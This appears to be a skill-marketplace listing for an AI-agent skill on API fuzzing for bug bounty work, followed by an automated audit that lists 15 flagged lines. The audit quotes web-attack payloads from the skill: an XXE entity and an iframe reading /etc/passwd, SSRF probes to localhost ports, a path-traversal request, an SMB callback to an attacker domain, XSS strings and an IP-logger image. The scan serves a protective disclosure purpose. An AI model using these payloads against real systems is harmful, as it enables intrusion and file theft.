Skip to main content

API Fuzzing for Bug Bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing during bug bounty engagements.

Install this skill

or
53/100

Security score

The API Fuzzing for Bug Bounty skill was audited on Feb 21, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

medium line 418

Curl to non-GitHub URL

SourceSKILL.md
418curl -X POST https://target.com/graphql \
high line 139

Access to /etc/passwd

SourceSKILL.md
139<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
high line 296

Access to /etc/passwd

SourceSKILL.md
296<iframe src="file:///etc/passwd" height=1000 width=800>
low line 58

External URL reference

SourceSKILL.md
58kr scan https://target.com -w routes-large.kite
low line 145

External URL reference

SourceSKILL.md
145<object data="http://127.0.0.1:8443"/>
low line 146

External URL reference

SourceSKILL.md
146<img src="http://127.0.0.1:445"/>
low line 154

External URL reference

SourceSKILL.md
154https://example.org/download?filename=a.png
low line 155

External URL reference

SourceSKILL.md
155https://example.org/download?filename=C:\inetpub\wwwroot\web.config
low line 156

External URL reference

SourceSKILL.md
156https://example.org/download?filename=\\smb.dns.attacker.com\a.png
low line 250

External URL reference

SourceSKILL.md
250http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
low line 253

External URL reference

SourceSKILL.md
253http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
low line 299

External URL reference

SourceSKILL.md
299<object data="http://127.0.0.1:8443"/>
low line 302

External URL reference

SourceSKILL.md
302<img src="http://127.0.0.1:445"/>
low line 305

External URL reference

SourceSKILL.md
305<img src="https://iplogger.com/yourcode.gif"/>
low line 418

External URL reference

SourceSKILL.md
418curl -X POST https://target.com/graphql \
Scanned on Feb 21, 2026
View Security Dashboard
Installation guide →
Rate this skill
Categorydevelopment
UpdatedMay 13, 2026
openclawapitestingsecurity-engineerml-ai-engineerbackend-developerdevelopment
haniakrim21/everything-claude-code